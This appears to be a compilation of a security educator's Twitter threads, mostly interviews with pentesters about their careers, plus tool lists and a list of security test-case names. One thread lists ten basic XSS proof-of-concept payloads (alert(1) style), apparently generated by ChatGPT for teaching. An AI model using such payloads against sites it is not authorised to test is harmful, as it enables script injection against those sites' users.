SecurityStories - 52 Weeks, 52 Stories: Story - 4

~ Don't lose your creativity. As soon as people get a cybersecurity job, they lose their curiosity and creativity.

Featuring Luke Stephens widely known as @hakluke who needs no introductions. Let's know his story. 🧵

Question: Could you briefly introduce yourself?

Luke: I'm Luke Stephens. I go by hakluke online. I'm a computer hacker and indie founder.

I'm a pentester and bug bounty hunter, but these days I spend most of my time running my businesses, Haksec.io (a pentesting consultancy) and HackerContent.com (a marketing agency for cybersecurity businesses)

Question: How did you get started in Cyber Security?

Luke: I started hacking at a very young age - I can't really remember precisely what drew me to it, but I know that the movie "The Matrix" had a significant part to play.

Question: What were the initial challenges and blockers you faced?

Luke: When I learned to hack, minimal resources were available on the internet. Today we are spoiled for choice!


Question: What is the learning methodology you followed or still follow?

Luke: ❌ Learn, learn, learn, learn, do.

✅ Learn, do, learn, do, learn, do.


I only really learn things if I need to know them for the project that I'm currently on. That way, my learning always has a purpose and a goal. I rarely sit down and watch tutorials about something because I might need it at some point in future.

Question: What all certifications do you hold, & what certificates would you recommend to the readers?

Luke: I have a Bachelor of Music and OSCP.
I would recommend something other than the Bachelor of Music. It hasn't advanced my career in cybersecurity. It was fun, though

Question: What is your favourite thing to hack on?

Luke: I love to hack on web applications.

Question: What does your tool arsenal look like - Could you share some?

Luke: A lot of my tools are ones I have written myself. I open source most of them on my GitHub, https://github.com/hakluke.

Other than that, I use Burp Suite and a bunch of tools from ProjectDiscovery.

Question: How do you cope with Burn Outs?

Luke: I stop doing whatever is burning me out. I also review the basics: Am I sleeping enough? Am I eating good food? Am I exercising? Am I giving myself time to relax?

Question: What would you advise the newcomers in Cyber Security?

Luke: Don't lose your creativity. As soon as people get a cybersecurity job, they lose their curiosity and creativity.

Try to keep your fire burning.

Question: How do you keep up with the latest trends in Cyber Security - Could you share your go-to resources?

Luke: Mostly Twitter, but I also sign up for several good newsletters. Namely Securibee's "Hive Five Newsletter" and Daniel Meissler's newsletter.

Question: What's your life outside hacking?

Luke: When I am not hacking, I mostly enjoy hanging out with my family.

Social Profiles
- Twitter: https://twitter.com/hakluke
- Web: https://hakluke.com
- LinkedIn: https://linkedin.com/in/hakluke/
- Newsletter: https://getrevue.co/profile/hakluke
- YouTube: https://youtube.com/hakluke
- TikTok: https://tiktok.com/@hakluke
- Insta: https://instagram.com/hakluke_

- Discord: hakluke#1337
- Mastodon: https://infosec.exchange/@hakluke

> Did you find Luke's story interesting and inspiring? Please share it with your friends and colleagues to spread the word.

> We will be coming up with more exciting and inspiring stories Weekly.

Follow Me on [Twitter](https://www.twitter.com/harshbothra_)

You can read the unrolled version of this thread here: https://typefully.com/harshbothra_/2ftfXJe

Security Stories - Story: 4 - Luke Stephens

#AppSecwithAI

Look what ChatGPT generated when I asked it to give me 10 XSS payloads for different scenarios - 🧵 ↓

1/10: `<svg/onload=alert(1)>` - This payload uses an SVG element with an onload event handler to trigger the XSS payload.

2/10: `<img/src=x onerror=alert(1)>` - This payload uses the onerror event handler to trigger the XSS payload when the image source is invalid.

3/10: `<img/src=x onerror=confirm(1)>` - This payload uses the onerror event handler to trigger a confirm box with the XSS payload when the image source is invalid.

4/10: `<form/action=javascript:alert(1)>` - This payload uses the action attribute of a form element to trigger the XSS payload.

5/10: `<input/onfocus=alert(1)>` - This payload uses the onfocus event handler to trigger the XSS payload when the input field is focused.

6/10: `<body/onload=alert(1)>` - This payload uses the onload event handler to trigger the XSS payload when the page loads.

7/10: `<link/href=javascript:alert(1)>` - This payload uses the href attribute of a link element to trigger the XSS payload.

8/10: `<script/src=data:text/javascript,alert(1)>` - This payload uses the src attribute of a script element to trigger the XSS payload with a data URI.

9/10: `<b/onmouseover=alert(1)>` - This payload uses the onmouseover event handler to trigger the XSS payload when the mouse is over the element

10/10: `<a/href='javascript:alert(1)'>`- This payload uses the href attribute of an anchor element to trigger the XSS payload

It's worth noting that these payloads are for educational purposes only.

10 XSS Payloads for Different Scenarios - #AppSecwithAI

SecurityStories - 52 Weeks, 52 Stories

~ Take regular breaks to give your mind and body a rest helps you cope up with cyber security burn outs a lot.

Featuring Nilesh Sapariya (@nilesh_loganx), a skilled pentester from India and working in UAE. Learn from his story 🧵 ↓

Question: Could you briefly introduce yourself?
Nilesh: I am Nilesh Sapariya, and I have worked in cybersecurity for the past ten years. My primary area of expertise is application security.

However, I am always eager to learn new things. Despite having a decade of experience in my field, I still consider myself a beginner. The cyber security domain is vast and ever-evolving, making it exciting and challenging to stay ahead of the curve.

I am an active member of the cybersecurity community (Null), engaging in bug bounty, CTF, and other security-based activities. In addition, I am part of the Cobalt Core and Synack Red Team, helping to identify and mitigate security vulnerabilities.

Question: How did you get started in Cyber Security?
Nilesh: When I was in 2nd year of engineering, our college got an invitation from a nearby college with multiple events organized. One of the events was "Ethical Hacking," which fascinated me a lot.

In this event, the speaker presented two laptops and demonstrated how he gained access to the other laptop from his machine via some graphic representation.

I am still unable to figure out how he did that, but this particular demonstration was the turning point of my life, and I decided to dive deep into it. After completing my engineering, the journey was rock bottom.

It's not easy for everyone to get a job with a low academic score in engineering.
I was one of them. I applied for jobs, attended many walk-in interviews, and got my first job in the networking field as a network engineer.

I used to work from 9 am to 6 pm (we did not have Saturday and Sunday off). I utilised my post-working hours to study ethical hacking and started researching it.

I still remember reading the theory and trying to visualize how virtual machines work to set up Kali Linux, and then I started practising. Finally, after learning for all these years, my hard work paid off.

I reported a vulnerability in Microsoft and got into their Hall of Fame list. That's it. Then the journey of becoming an ethical hacker started. After that, I never looked back. I got many halls of fame in top-notch organizations.

During this period, I got invitations from various top engineering colleges in Mumbai (India) to conduct workshops on Ethical Hacking. I decided to share this knowledge without any monetary reward to help beginners.

I have undertaken many talks at various colleges, which can be found here. So, with this knowledge, skills, and many HOF, I got my first job in Cyber Security in 2013.

Question: What were the initial challenges and blockers you faced?

Nilesh: Initially, I faced many challenges & blockers when starting my cyber security career. I needed to figure out where to start or what to read and which path to follow.

I had to go through a lot of trial and error before finding my footing. I did a lot of research and dedicated a lot of time to understanding the basics of cyber security, learning the different tools and techniques, and developing my skillset.

I had to take a lot of risks and also face a lot of failures before I eventually found success. However, I overcame the initial challenges and blockers through dedication, hard work, and perseverance and became a successful cybersecurity specialist.

All thanks to the people who supported me during this journey, including my mentors, and obviously, god's grace is a must.

Question: What is the learning methodology you followed or still follow?


Nilesh: The learning methodology I have followed for cyber security combines self-learning and hands-on experience via the PortSwigger lab.

I have been researching and reading about the different concepts and tools used in cybersecurity and also attending online courses and workshops. Additionally, I have been participating in online CTFs (Capture the Flag) to develop my skills.

Question: What all certifications do you hold, and what certificates would you recommend to the readers?

Nilesh: I currently hold several certifications in cybersecurity, including

• Offensive Security Certified Professional (OSCP)
• Offensive Security Wireless Professional (OSWP)
• Certified Red Team Professional (CRTP)
• Certified Ethical Hacker (CEH) v8
• Certified Blockchain Expert
• AWS Certified Cloud Practitioner
• AZ-900 & AZ-50

Readers should select a certification in the area of cyber security that is most suitable for their goals. For instance, the Offensive Security Certified Professional (OSCP) certification is popular for those specialising in offensive security.


In contrast, the Certified Red Team Professional (CRTP) certification suits those interested in red teaming.

Question: What is your favourite thing to hack on?

Nilesh: I like exploring all targets: web applications, APIs, mobile, networks, etc. But if I want to pick the best target, it will always be "web application".

Question: What does your tool arsenal look like - Could you share some?

Nilesh: My go-to tools for the recon process are:

• dirserach
• dirb
• Nikto
• ffuf
• Nuclei
• Sublist3r etc. (There are many, but usually these are go-to tools)

For Web Application Testing, my go-to tools are:

• Burp Suite Professional and its some excellent extensions such as (AutoRepeater, JS Link Finder, Error Message Check etc. )

For Network Penetration Testing usually, my go-to tools are:

• Kali Linux

• Nessus Pro

Many tools might not be mentioned here, but the above is just a high-level view of the essential tools in my day-to-day engagements.

Question: How do you cope with Burn Outs?

Nilesh: Burnout in cyber security and bug bounty can be a challenge, but there are some steps which I usually follow:

1.  Take Breaks: Take regular breaks throughout the day to give your mind and body a rest. Even if it's just 10 minutes, take a step away from your work and relax.

2.  Set realistic goals: Setting realistic goals and not trying to do too much can help you avoid Burnout. Break your tasks into manageable parts and focus on one task at a time. Remember to reward yourself when you reach a goal.

3.  Exercise Regularly: Exercise is a great way to reduce stress and increase energy levels. Take Time to go for a walk, bike ride, or even do some stretching or yoga.

4.  Eat Healthily: Eating a healthy diet is essential for overall health & can help your mind and body stay energized.
5.  Find a Mentor: Find someone in the cyber security & bug bounty community who you can look up to and learn from. Having a mentor can keep you motivated

6.  Take Time off: It's essential to take some time off every once in a while. Take a day off or a weekend away to relax and recharge your batteries.

Question: What would you advise the newcomers in Cyber Security?

Nilesh: I advise newcomers to Cyber Security to start by familiarizing themselves with computer security and the typical online threats.

This includes researching and understanding the most common techniques used to exploit vulnerable systems and educating themselves on the different types of vulnerability and how to protect against them.

I want to highlight a few essential points that newcomers can follow for success:

7.  Learn the fundamentals and Educate yourself: Learning about the different aspects of cyber security is the first step to getting started

Take the Time to read up on the different areas of cyber security, including data security, network security, application security, and more.

8.  Take advantage of the free resources available over the internet. Many resources provide cybersecurity training and tutorials, so take advantage of them.

9.  Get Certified: Getting certified in one or more areas of cyber security is a great way to demonstrate your expertise and stand out in the field. Consider getting certified in CEH, CISSP, or other popular cyber security certifications.

10.  Start Networking: Networking with other cybersecurity professionals is a great way to learn more about the field and stay up to date on the latest trends and technologies. For example, join a local cyber security meetup / attend an industry conference to make contacts

11.  Join a Cyber Security Community: Cybersecurity communities are a great way to learn from your peers and get advice from experts. Look for local groups or join an online community like Nullmeet.

12.  Keep up with the latest news. Cyber security is constantly evolving, so stay up to date on the latest news and developments in the industry. Again, the best place is Twitter.

13.  Understand the legal and ethical implications of cyber security. Cybersecurity is not just about technology; it is also about understanding the legal and ethical implications of the technology.

14.  Develop a cyber security strategy for yourself. Test your skills and knowledge with cyber security challenges and competitions. Portswigger lab is good to start with if you look forward to application security.

Likewise, as per your area of interest, find a site which provides free tutorials.

15.  Consider working for a cybersecurity firm or taking an internship.

Question: How do you keep up with the latest trends in Cyber Security - Could you share your go-to resources

Nilesh: To stay up-to-date on the latest trends in cyber security, I follow security researchers on Twitter. This allows me to stay informed of the most current trends and developments in the field.

In addition to that, I use the PortSwigger Web Security Academy to practice different types of attacks.

Question: What's your life outside hacking?

Nilesh: Apart from hacking, I am passionate about writing inspiring blogs - https://nileshsapariya.blogspot.com/search/label/Lessons%20Learnt.

In my spare time, I share my love of cooking through my food blogging YouTube channel, posting videos of my culinary creations and occasionally vlogging. - https://www.youtube.com/c/IndianFoodiesExpress -

Subscribe to my channel, and I'll give you a virtual hug! ;) Just kidding, but seriously, it would make me so happy if you subscribed!

Social Profiles

• LinkedIn: https://www.linkedin.com/in/nileshsapariya/
• Twitter: https://twitter.com/nilesh_loganx @nilesh_loganx
• Blog: https://nileshsapariya.blogspot.com/

> Did you find Nilesh's story interesting and inspiring? Please share it with your friends and colleagues to spread the word.

> We will be coming up with more exciting and inspiring stories Weekly.

Follow Me on [Twitter](https://www.twitter.com/harshbothra_)

SecurityStories - Nilesh Sapariya

SecurityStories - 52 Weeks, 52 Stories

Story - 2: Featuring Sumit Grover (@sumgr0)

Learn more about Sumit in 🧵

Question: Could you briefly introduce yourself?

Sumit: Hi! I'm Sumit Grover & I'm passionate about computer security + forensics. For the past 7 months, I've been a full-time bug bounty hunter. 2 years ago, I discovered "bug bounty" while watching a security-related video.

After that, I registered on all available platforms while unsure how to begin. With some experience in vulnerability assessment and penetration testing, I slowly started reading Medium articles and other blogs on bug bounty.

That's when I came across Luke's (@hakluke) automation for Subdomain Takeovers. I then started using these techniques and refining them almost every day. After some time, I found my first subdomain takeover and began the actual journey in bug bounty.

Question: How did you get started in Cyber Security?

Sumit: The Cyber Security journey began with a Discovery Channel's show on Hackers featuring a story from Ernst and Young a long time back. This show inspired me to get into cyber security and be an ethical hacker.

Question: What were the initial challenges and blockers you faced?
Sumit: Back in the day, finding and reporting vulnerabilities you'd come across on the internet to the responsible teams was a big challenge.

For example, I still remember a price change vulnerability I came across on the Indiatimes Shopping website while making an actual purchase. Still, it took me many rounds of emails to finally get their attention and have the fix in place.

Question: What is the learning methodology that you followed or that you still follow?

Sumit: As a learning process, there will be better mediums, so I go through medium posts, blogs, youtube videos, and Twitter feed to learn about the specific topics of interest. I also connect with people to discuss my challenges and share my experiences with them.

Question: What all certifications do you hold, and what all certificates would you recommend to the readers?

Sumit: I've successfully only completed CEH and attempted the CHFI certifications for now.

Depending on the role people are targeting to achieve, knowledge is more important than actual certifications. Having credentials may only get you into the job role, but one can only be successful with the basic know-how of the tasks.

Question: What is your favourite thing to hack on?

Sumit: My favourite bug has been Subdomain Takeover, and it continues to excite me to hunt for them after three years.

Question: What does your tool arsenal look like - Could you share some?
Sumit: I use recon tools & methodologies to collect as much data as possible and do this every day. The recon toolset I use is already known to the public, like Amass, Findomain, Subfinder, Sublist3r.

Question: How do you cope up with Burn Outs?

Sumit: Honestly, I'm yet to experience my burnout. I've ensured to spend time with the family, learn new tricks, optimize my automation workflow. I keep taking break sessions while still having those dedicated hunting time.

Question: What would you advise the newcomers in Cyber Security?

Sumit: It is essential to know about everything in Cyber Security, but it is most important to be a specialist in at least one technology/process.

Learn about everything happening in the industry while you master one skill that you enjoy. This is important from my experience.

Question: How do you keep up with the latest trends in Cyber Security - Could you share your go-to resources?

Sumit: I'm active on Twitter & get all the latest news & connections from there. I've subscribed to blog posts and medium users sharing the topics of my interest.

Question: What's your life outside hacking?
Sumit: I'm very social & spend quality time with family & friends. I enjoy travelling and am a big-time foodie. At the same time, I also enjoy occasional cooking for the family.

Social Profiles
- Twitter: https://twitter.com/sumgr0

Did you find Sumit's story interesting and inspiring? Please share it with your friends and colleagues to spread the word.

We will be coming up with more exciting and inspiring stories Weekly.

Follow Me on Twitter @harshbothra_

Security Stories - 2: Featuring Sumit Grover

Don't let your Applications & APIs be a security risk.

Protect them with these 100 Security Test Cases 🧵


1. Broken Object Level Authorization
2. Broken User Authentication
3. Excessive Data Exposure
4. Lack of Resources & Rate Limiting
5. Broken Function Level Authorization
6. Security Misconfigurations
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization

9. Insufficient Logging & Monitoring
10. Using Components with Known Vulnerabilities
11. Using Components with Unsupported Versions
12. Insufficient Exception Handling
13. Insufficient Transport Layer Protection
14. Insufficient Authorization


15. Insecure Cryptographic Storage
16. Unvalidated Redirects & Forwards
17. Caching Problems
18. XML External Entity Injection (XXE)
19. Insecure Direct Object References
20. Unvalidated User Inputs
21. Security Misconfiguration of Server-Side APIs


22. Insufficient Verification of Data Authenticity
23. Lack of Access Control on Server-Side APIs
24. Hardcoded Credentials
25. Insecure Server-Side Request Forgery (SSRF)
26. Buffer Overflow
27. Session Fixation
28. XML Entity Expansion
29. Insecure Randomness


30. Unvalidated SSL Certificates
31. Insecure Communication Between Components
32. Insecure Network Services
33. Improper Error Handling
34. Information Leakage
35. Insufficient Validation of Inputs
36. CORS Misconfiguration
37. Denial of Service
38. SQL Injection


39. NoSQL Injection
40. Path Traversal
41. Race Conditions
42. Code Injection
43. Malicious File Execution
44. Directory Listing
45. Command Injection
46. File Inclusion
47. CRLF Injection
48. LDAP Injection
49. Header Injection
50. XPath Injection


51. Cross-Site Request Forgery (CSRF)
52. Clickjacking
53. SQL Injection Into Out-of-Band Channel
54. Use of Vulnerable Components
55. Improper Certificate Validation
56. Use of Unsafe Cryptographic Algorithms
57. Weak Password Requirements
58. Unprotected APIs


59. Insufficient Security Configuration
60. Insecure Network Protocols
61. Insufficient Authorization Schemes
62. Insecure Cryptographic Coding Practices
63. Insufficient Access Control
64. Unvalidated Inputs or Outputs
65. Insecure Authentication


66. Unprotected Sensitive Data
67. Insecure Session Management
68. Insecure Storage of Sensitive Information
69. Insecure Direct Object References
70. Insufficient Security Logging
71. Insufficient Session Expiration
72. Insufficient Password Strength

73. Insufficient Session Validation
74. Insufficient Authentication Challenges
75. Insufficient Authorization Enforcement
76. Insufficient Input Validation

77. Insufficient Output Encoding
78. Insufficient Cross-Domain Access Control
79. Insufficient Access Control to Sensitive Data
80. Insufficient Password Change Requirements
81. Insufficient Risk Scoring
82. Insufficient Authorization Verification

83. Insufficient Integrity Verification
84. Insufficient Encryption Algorithms
85. Insufficient Key Management
86. Insufficient Encryption Key Strength
87. Insufficient Encryption Key Length
88. Insufficient Encryption Key Generation
89. Unprotected File Uploads

90. Insecure Third-Party Component Usage
91. Insufficient Key Rotation Procedures
92. Insecure Client-Side Storage
93. Insufficient Key Derivation Function Selection
94. Insecure Key Storage
95. Insufficient Key Generation
96. Insufficient Key Distribution


97. Insufficient Key Exchange
98. Insufficient Key Verification
99. Unprotected API Endpoints
100. Insecure Transport Layer Protection.


These test cases were generated using @ChatSonicAI and results were better than expected.

You can read the unrolled version of this thread here: https://typefully.com/harshbothra_/SAZHpqz

100 Application & API Security Test Cases

Playing with JavaScript and executing a prototype pollution attack is always interesting thing to do.

Learn about Prototype Pollution: https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks

First blog of 2023. I hope you like it

What are your go-to tools for productivity and daily use?

My Go-To Tools for Productivity and Daily Use 🧵 1/

2/

📒  Google Keep - I keep my daily planner here, so that I can track everything from tasks to upcoming events in one place.

🎯  Trello - Great for goal setting & tracking progress on projects /goals with ease. It's also a great visual way of seeing what needs attention!

3/

🔖 Notion - Notes management has never been easier than when using this tool--I love the ability to organize notes into categories as well as create custom templates or integrate other tools like calendars and databases all within one workspace!

4/

💻 Visual Studio Code & Sublime – These are two of the most powerful text editors out there–both come equipped with tons of features making them perfect choices if you’re looking to write code or document your work quickly without having too much overhead getting started.

5/

🕐 Typefully – Scheduling tweets was always an annoying task until discovering this nifty little app...it allows me schedule posts ahead of time while still allowing flexibility during those spurts where inspiration strikes suddenly ;)

6/

⇧ TextExpander – Shortcodes are an important part of staying productive so I use this tool for creating custom templates and quickly inputting large chunks of text without needing to type them out each time

Share your favourite producitivity and daily use tools, apps & softwares in comments.

6 Productivity Tools One Must Try

SecurityStories - Story - 1

Featuring Ahmet Gurel @ahmettgurell, A well known Security Researcher & Ethical Hacker from Turkey.

Read his SecurityStory: https://harsh-bothra.github.io/SecurityStories/SecurityStories/ahmet-gurel.html

A Twitter thread will be published soon :)

This year (2022), I have worked on creating educational resources in various forms, such as blogs, Twitter series, mindmaps and others. In case you missed them, here are all of them:

# SecurityExplained Twitter Series:

- https://github.com/harsh-bothra/SecurityExplained

🧵 - 1/5

2/5

# MindMaps
1. Forget Password Vulns: https://xmind.net/m/nZwbdk/

2. XML Attacks: https://xmind.net/m/xNEY9b/

3. 2FA Bypass Techniques: https://xmind.net/m/8Hkymg/

4. Android PT Checklist: https://xmind.net/m/GkgaYH/

5. Cookie Based Auth Vulnerabilities: https://xmind.net/m/2FwJ7D/

3/5

6. Scope Based Recon: https://xmind.net/m/hKKexj/

7. Unauthenticated JIRA CVEs: https://xmind.net/m/Jrn7f8/

# Blogs

1. https://www.cobalt.io/blog/graph-query-language-explained

2. https://www.cobalt.io/blog/protect-against-server-side-request-forgery

3. https://www.cobalt.io/blog/web-socket-vulnerabilites

4. https://www.cobalt.io/blog/introduction-to-serverless-vulnerabilities

5. https://www.cobalt.io/blog/hunting-for-broken-link-hijacking-blh


4/5

6. https://www.cobalt.io/blog/introduction-to-command-injection-vulnerability
7. https://developer.cobalt.io/bestpractices/protect-against-xxe

8. https://developer.cobalt.io/bestpractices/protect-against-ssrf

9. https://blog.yeswehack.com/yeswerhackers/getting-started-ios-penetration-testing-part-1/

10. https://blog.yeswehack.com/yeswerhackers/getting-started-ios-penetration-testing-part-2/

11. https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/

12. https://blog.yeswehack.com/yeswerhackers/abusing-s3-bucket-permissions/




5/5
Apart from these, I have shared many threads on my Twitter account: https://twitter.com/harshbothra_!

While this year was incredible, next year will be thrilling as I will develop some new content, and some new series. So feel free to drop what you want to see next in the comments.


6 Burp Extensions to Check for Access Control & Privilege Escalation Issues. 

🧵

1/ 

1. Autorize 

https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f

2/

2. AuthMatrix

https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e

3/ 

3. AutoRepeater

https://portswigger.net/bappstore/f89f2837c22c4ab4b772f31522647ed8

4/

4.  Auth Analyzer 
https://portswigger.net/bappstore/7db49799266c4f85866f54d9eab82c89

5/

5. Authz

https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e

6/ 

6. Multi Session Replay 

https://portswigger.net/bappstore/47319d00cae2447e8319db423913e19c